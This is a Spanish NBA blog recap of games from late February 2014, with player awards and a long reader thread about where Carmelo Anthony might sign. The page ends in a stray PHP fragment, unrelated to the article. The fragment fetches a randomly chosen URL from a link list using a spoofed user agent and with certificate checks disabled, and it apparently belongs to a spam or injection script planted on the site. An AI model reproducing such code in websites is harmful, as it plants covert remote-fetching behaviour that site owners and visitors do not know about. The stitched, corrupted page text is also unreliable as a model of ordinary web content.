La Crónica: The Dark Knight rises

28 de February de 2014 por TheDeerHunter

Volvió LeBron y lo hizo como a él le gusta: Dando espectáculo hasta en el más pequeño detalle. Aparecía con una máscara protectora pero no transparente como el resto de los mortales sinó negra que le daba un toque muy “a lo Batman”. Si estorbaba su juego no lo parecía ya que se fue a los 31 con excelentes porcentajes. De esta manera volvió a doblegar a Melo (12-2 en sus enfrentamientos) y a unos Knicks que parecen tener asumido su destino (82-108). Los campeones han puesto velocidad de crucero y vuelven a firmar un Febrero casi inmaculado.

Los Wizards consiguieron su segunda victoria consecutiva tras la ausencia de Nene aunque en Toronto sudaron sangre en hasta 3 prórrogas. Wall y Gortat se fueron hasta los 31 puntos (y fueron decisivos para forzar las diferentes prórrogas) mientras que por los Raptors DeRozan estuvo brutal, Lowry rozó el triple doble y Vasquez cuajó uno de sus mejores partidos del año (134-129).

En Denver, los Nuggets continúan su particular viacrucis y dieron todas las facilidades del mundo a los Nets para que se llevaran la victoria. Buen partido de Paul Pierce pero flojo del resto de los titulares. La segunda unidad marcó la diferencia con 8 hombres sumando buenos minutos (112-89).

Finalmente Indiana sufrió más de la cuenta contra Milwaukee en casa pero en esta ocasión fue Roy Hibbert quien desatascó la situación (96-101). Si no es uno un día será otro. 

PREMIOS

MVP: Vaya, vaya con la parejita John Wall Marcin Gortat. Ambos anotaron 31 puntos que el base complementó con 9 asistencias y 3 robos y el pívot con 12 rebotes y 4 tapones. Con los 2 a este nivel es difícil que se les escape un partido a los Wizards. Aunque lo justo sería indicar que Lebron James también anotó 31 puntos sin 3 prórrogas ni nada.

Rookie: En un partido con minutos para todos Mason Plumlee anotó 10 puntos, cogió 9 rebotes y puso 3 tapones. Tiene pinta de que le veremos muchos años por la liga.

Sorpresa: Greivis Vasquez disputó muchos minutos (hasta 39) y se fue a los 26 puntos y 8 asistencias. Las cosas parecen marcharle un poco mejor en Toronto. Andre Miller jugó apenas 15 minutos pero fueron suficientes para anotar 11 puntos, pillar 3 rebotes, repartir 2 asistencias y robar 2 balones. Las espaldas de Wall por fin están cubiertas.

Decepción: Muy mal día para Tim Hardaway Jr. El de los Knicks falló 13 de sus 15 lanzamientos a canastas y se quedó en 6 puntos. Jugar ante Lebron y compañía intimida.

Esfuerzo en vano: Y tras 57 minutos de lucha, 34 puntos, 4 rebotes y 6 asistencias, Demar DeRozan hincó la rodilla.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. Denise dice:
    #1

    Si yo fuese Melo me piraría de los Knicks este verano. Viendo el cuadro salarial del equipo, el año que viene será otro año tirado a la basura, y dentro de 2 años, aun estarán pagando 13 kilos entre JR, Felton y Prigioni.
    De entre los equipos con más margen salarial para fichar agentes libres este verano, la mejor opción para Melo serían los Mavs. Su llegada al equipo texano podría propiciar que veteranos sin anillo como Nowitzki y Marion renovasen por la mitad de lo que cobran actualmente y que Carter también renovase por una cantidad similar a los 3 kilos que cobra. Con eso, aún tendrían margen para ir a por un Center como Gortat ó Okafor.

    Otro equipo donde molaría serían los Pelicans formando tandem con Davis, y con un poco de paciencia, podría ir también a una ciudad con más mercado como Philadelphia donde le esperaría un equipo con una proyección enorme con Young, Noel, Carter-Williams, los dos Top 10 que van a pillar del próximo Draft y aun así unos 15-20 kilos para fichar a más agentes libres.

      Citar

  2. Simon dice:
    #2

    Denise:
    . Su llegada al equipo texano podría propiciar que veteranos sin anillo como Nowitzki y Marion renovasen por la mitad de lo que cobran actualmente

    Ejem Ejem. No recuerdas a los Mavs que son los únicos que hasta la fecha han derrotado al Big Three de Miami??? jejejejejeje

      Citar

  3. Simon dice:
    #3

    Por cierto Denise estoy de acuerdo contigo en que los Mavs sería un buen sitio para él pero me gustaría que se quedara en el Este. Me da igual el equipo pero si una de las mayores estrellas del Este hace las maletas para irse a la otra conferencia apaga y vámonos.

    Por buscar alguna posibilidad de que se fuera a un equipo del este pa subir el nivel de la conferencia creo que si no va a renovar en NY podrían buscar un traspaso con Detroit. Smith y Jennings por Melo ( aunque supongo que los Knicks preferirán a Monroe ) o algo así. Los NY consiguen dos buenos jugadores que junto a Hardaway podrían hacer un buen trio en el futuro. Y los Pistons podrían poner a Smith de 4 y a Melo de 3. La posición de point guard se quedaría muy coja pero aún les quedaría dinero para fichar algún veterano tipo Nelson o incluso a Vasquez o alguien de ese estilo.

    Por supuesto que no creo q Melo ( más bien LaLa) no creo que quisiera ir a Detroit.

      Citar

  4. rumbero dice:
    #4

    Simon: Ejem Ejem. No recuerdas a los Mavs que son los únicos que hasta la fecha han derrotado al Big Three de Miami???jejejejejeje

    Jajaj me has robado el comentario.
    Otro rumor que ha ido sonando es el de Chicago. Con casi 30 años a cuestas no creo que se la juegue con proyectos jóvenes a medio/largo plazo. Habría que amnistiar a Boozer (viendo la temporada de Gibson no sería ningún drama) y aún así no se si les quedaría demasiado dinero a ofrecer, pero podría estaría dispuesto a sacrificar algo con tal de jugar en un equipo que defiende.

    Del partido lo que más ha molado ha sido la máscara de Lebron con la que ha acojonado al personal más de lo habitual. A Hardaway Jr. le habrá impactado porque pobre chaval vaya partido se ha cascado. Y la defensa de Woodson amigos…esa gran farsa

      Citar

  5. Vader dice:
    #5

    Yo creo que Chicago es su opción más seria si decide irse de NY. Atención a las noticias sobre Mirotic y su destino NBA porque ahí puede estar la clave del futuro de Melo. Si los Bulls fichan a Mirotic ya no tendrian espacio para ofrecer el tope a Melo.

    Amnistiando a Boozer les quedaria un quinteto de miedo: Rose, Butler, Melo, Gibson y Noah.

    Aunque los Knicks se movieran muy bien la noche del draft veo muy difícil que pueda igualar el proyecto de los Bulls si se deciden a ir a por Melo. Otra cosa es que lo hagan, ya que el propietario es un poco tacañon… Las otras opciones que decis ya no las veo tan claras, vete tu a saber…

    Saludos

      Citar

  6. Esteban dice:
    #6

    Granger y Glen Davis a los Clippers, parece un hecho,

    ahora si…

      Citar

  7. Denise dice:
    #7

    Simon:
    Por cierto Denise estoy de acuerdo contigo en que los Mavs sería un buen sitio para él pero me gustaría que se quedara en el Este. Me da igual el equipo pero si una de las mayores estrellas del Este hace las maletas para irse a la otra conferencia apaga y vámonos.

    Por buscar alguna posibilidad de que se fuera a un equipo del este pa subir el nivel de la conferencia creo que si no va a renovar en NY podríanbuscar un traspaso con Detroit. Smith y Jennings por Melo ( aunque supongo que los Knicks preferirán a Monroe )o algo así. Los NY consiguen dos buenos jugadores que junto a Hardaway podrían hacer un buen trio en el futuro. Y los Pistons podrían poner a Smith de 4 y a Melo de 3. La posición de point guard se quedaría muy coja pero aún les quedaría dinero para fichar algún veterano tipo Nelson o incluso a Vasquez o alguien de ese estilo.

    Por supuesto que no creo q Melo ( más bien LaLa) no creo que quisiera ir a Detroit.

    Y si chavales..se me olvidó el anillo de los Mavs…

    Ya, yo tambien prefiero que se quede en el Este para equilibrar la conferencia, pero poniendome en su piel, esto como jugador te debe dar igual, y con lo que tienen los Mavs ya más el buen hacer de Cuban que no tiene reparos a la hora de gastar en jugadores, ahí yo creo que si podría encontrar un buen cobijo.
    Que por cierto, yo que hice el analisis de Dallas, dudaba bastante de Monta y su relación con un base organizador como Calderón, pero de momento bastante bien se están llevando.

    Y lo de Detroit suena cojonudo también, pero Simón, los Pistons tienen margen de sobra para fichar a Melo sin tener que dar a Jennings y Smith a cambio. Con Melo, Smith de 4 semiabierto y toda la zona para el futuro mejor center de la liga mi querido Drummond, ahí si habría material para intentar asaltar el anillo.

      Citar

  8. Ruxixon dice:
    #8

    Hombre,yo creo que con Melo habrá que tener en cuenta además del proyecto,el estilo de la vida de la ciudad,y porque no,los impuestos que se paguen en la misma/estado.En ese sentido dudo mucho que Melo acepte jugar en Detroit,y en el lado contrario,Dallas,por lo menos a nivel impositivo es un chollo.Además Cuban es muy ambicioso cuando se lo propone así que no dudaría en formar un equipo competitivo en torno a Melo -aunque con Dirk no me acaba de pegar-.

      Citar

  9. Esteban dice:
    #9

    Butler nuevo jugador del Thunder, a ver si Brooks espabila y hace jugar a Ibaka de 5 , a durant de 4 para darle mas minutos a jackson y butler

    o copian el modelo del Heat con un 4 jugando de 5 o se quedan otra vez en las puertas

      Citar

  10. Denise dice:
    #10

    Caron Butler se compromete con OKC . Buen movimiento para los Thunder, pero por quien debían haber ido a deguello era a por Glen Davis, ahí en la pintura si necesitaba un refuerzo.

      Citar

  11. Ruxixon dice:
    #11

    ¿Miami no va a firmar a nadie?¿Ben Gordon quizás?¿Nos quedamos con lo que hay?

      Citar

  12. Denise dice:
    #12

    Ruxixon:
    ¿Miami no va a firmar a nadie?¿Ben Gordon quizás?¿Nos quedamos con lo que hay?

    ¿Te apetecen Antawn Jamison y Metta World Peace?

      Citar

  13. Esteban dice:
    #13

    Denise: ¿Te apetecen Antawn Jamison y Metta World Peace?

    no me apetecen ninguno de los dos, Miami no necesita ningún jugador de estos que están dando vuelta, estilo “buenos pero no tanto”, esta sobrado de ellos, de hecho Lewis y Haslem (jugadores de ese estilo) prácticamente no ven acción,

    lo único que necesitaría el Heat es un centro grandote para marcar a Hibbert; Bynum debió de ser su fichaje

      Citar

  14. Txusma dice:
    #14

    lo único que necesitaría el Heat es un centro grandote para marcar a Hibbert; Bynum debió de ser su fichaje

    Ese es Oden, no?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>